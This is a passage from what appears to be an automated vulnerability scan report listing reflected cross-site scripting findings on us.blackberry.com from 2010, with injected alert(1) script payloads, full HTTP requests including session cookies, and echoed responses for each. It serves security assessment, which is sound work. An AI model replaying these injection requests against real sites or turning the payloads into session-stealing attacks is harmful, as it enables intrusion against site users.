<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/compare/e2b76"><script>alert(1)</script>73cae73d93d/" />
...[SNIP]...

1.9. http://us.blackberry.com/eng/devices/modalContent.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/devices/modalContent.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86a9"><script>alert(1)</script>2dfcd2a8883 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/devices/d86a9"><script>alert(1)</script>2dfcd2a8883?modalid=shareMenu&url=http://us.blackberry.com/smartphones/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:37 GMT
Date: Wed, 24 Nov 2010 22:54:37 GMT
Connection: close
Content-Length: 21941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/d86a9"><script>alert(1)</script>2dfcd2a8883/" />
...[SNIP]...

1.10. http://us.blackberry.com/eng/devices/modalContent.jsp [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/devices/modalContent.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2400b"><script>alert(1)</script>435aafeecb6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/devices/modalContent.jsp?modalid=shareMenu&url=http://us.blackberry.com/smartphones/2400b"><script>alert(1)</script>435aafeecb6 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:27 GMT
Date: Wed, 24 Nov 2010 22:54:27 GMT
Connection: close
Content-Length: 2978

<!-- template-body -->


   <div class="shareModal modalSprite">
       <div class="content">
                   <div class="label">Share</div>
                   <a class="cta close" href="#" target="_blank"></a
...[SNIP]...
<a onclick="shareLinkClicked(this.innerHTML);" href="http://buzz.yahoo.com/buzz?targetUrl=http://us.blackberry.com/smartphones/2400b"><script>alert(1)</script>435aafeecb6?CPID=OTC-SHAREYAHOOBUZZ" class="iconB modalSprite icon" target="_blank">
...[SNIP]...

1.11. http://us.blackberry.com/eng/purchase/icon_games.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/purchase/icon_games.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc40"><script>alert(1)</script>dd37119a0ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/purchase/1cc40"><script>alert(1)</script>dd37119a0ba HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:37 GMT
Date: Wed, 24 Nov 2010 22:54:37 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/1cc40"><script>alert(1)</script>dd37119a0ba/" />
...[SNIP]...

1.12. http://us.blackberry.com/eng/purchase/icon_phone.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/purchase/icon_phone.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff8e"><script>alert(1)</script>59681c8f09e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/purchase/bff8e"><script>alert(1)</script>59681c8f09e HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:35 GMT
Date: Wed, 24 Nov 2010 22:54:35 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/bff8e"><script>alert(1)</script>59681c8f09e/" />
...[SNIP]...

1.13. http://us.blackberry.com/eng/purchase/icon_software.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/purchase/icon_software.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60ae"><script>alert(1)</script>25475e12463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/purchase/d60ae"><script>alert(1)</script>25475e12463 HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:34 GMT
Date: Wed, 24 Nov 2010 22:54:34 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/d60ae"><script>alert(1)</script>25475e12463/" />
...[SNIP]...

1.14. http://us.blackberry.com/eng/purchase/united-states/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/purchase/united-states/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b0a"><script>alert(1)</script>a45893577d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/purchase/united-states56b0a"><script>alert(1)</script>a45893577d4/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:11 GMT
Date: Wed, 24 Nov 2010 22:55:11 GMT
Connection: close
Content-Length: 21906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/united-states56b0a"><script>alert(1)</script>a45893577d4/" />
...[SNIP]...

1.15. http://us.blackberry.com/navigation/search.do [siteSearch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /navigation/search.do

Issue detail

The value of the siteSearch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef988'%3balert(1)//d68cffd0896 was submitted in the siteSearch parameter. This input was echoed as ef988';alert(1)//d68cffd0896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /navigation/search.do?siteSearch=ef988'%3balert(1)//d68cffd0896&searchMode=simple&pageServletPath=%2Findex.jsp&pageQueryString=&domainID=47&firstTime=true HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":2,"to":3,"c":"http://us.blackberry.com/business/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/5; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=dawson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:55:48 GMT
Connection: close
Content-Length: 33188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<script>
$$('#searchForm2 .inputField')[0].value='ef988';alert(1)//d68cffd0896';
</script>
...[SNIP]...

1.16. http://us.blackberry.com/navigation/search.do [siteSearch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /navigation/search.do

Issue detail

The value of the siteSearch request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec378"%3balert(1)//d4e5e27dc93 was submitted in the siteSearch parameter. This input was echoed as ec378";alert(1)//d4e5e27dc93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /navigation/search.do?siteSearch=%27ec378"%3balert(1)//d4e5e27dc93&searchMode=simple&pageServletPath=%2Findex.jsp&pageQueryString=&domainID=47&firstTime=true HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":2,"to":3,"c":"http://us.blackberry.com/business/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/5; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=dawson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:55:47 GMT
Connection: close
Set-Cookie: server_instance=jasper; Path=/
Content-Length: 33194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<script>
$('viewMoreSidebarLinkA').href = "search.do?searchPrimary=support&searchMode=simple&firstTime=true&q='ec378";alert(1)//d4e5e27dc93";
</script>
...[SNIP]...

1.17. http://us.blackberry.com/navigation/search.do [siteSearch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /navigation/search.do

Issue detail

The value of the siteSearch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 109ed%3balert(1)//3d6a7c91d3f was submitted in the siteSearch parameter. This input was echoed as 109ed;alert(1)//3d6a7c91d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /navigation/search.do?siteSearch=%27109ed%3balert(1)//3d6a7c91d3f&searchMode=simple&pageServletPath=%2Findex.jsp&pageQueryString=&domainID=47&firstTime=true HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":2,"to":3,"c":"http://us.blackberry.com/business/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/5; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=dawson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:55:50 GMT
Connection: close
Set-Cookie: server_instance=banff; Path=/
Content-Length: 33188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<script>
$$('#searchForm2 .inputField')[0].value=''109ed;alert(1)//3d6a7c91d3f';
</script>
...[SNIP]...

1.18. http://us.blackberry.com/purchase/accessories_purchase_promo2.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/accessories_purchase_promo2.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8da1"><script>alert(1)</script>ddb678e61e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/d8da1"><script>alert(1)</script>ddb678e61e4 HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
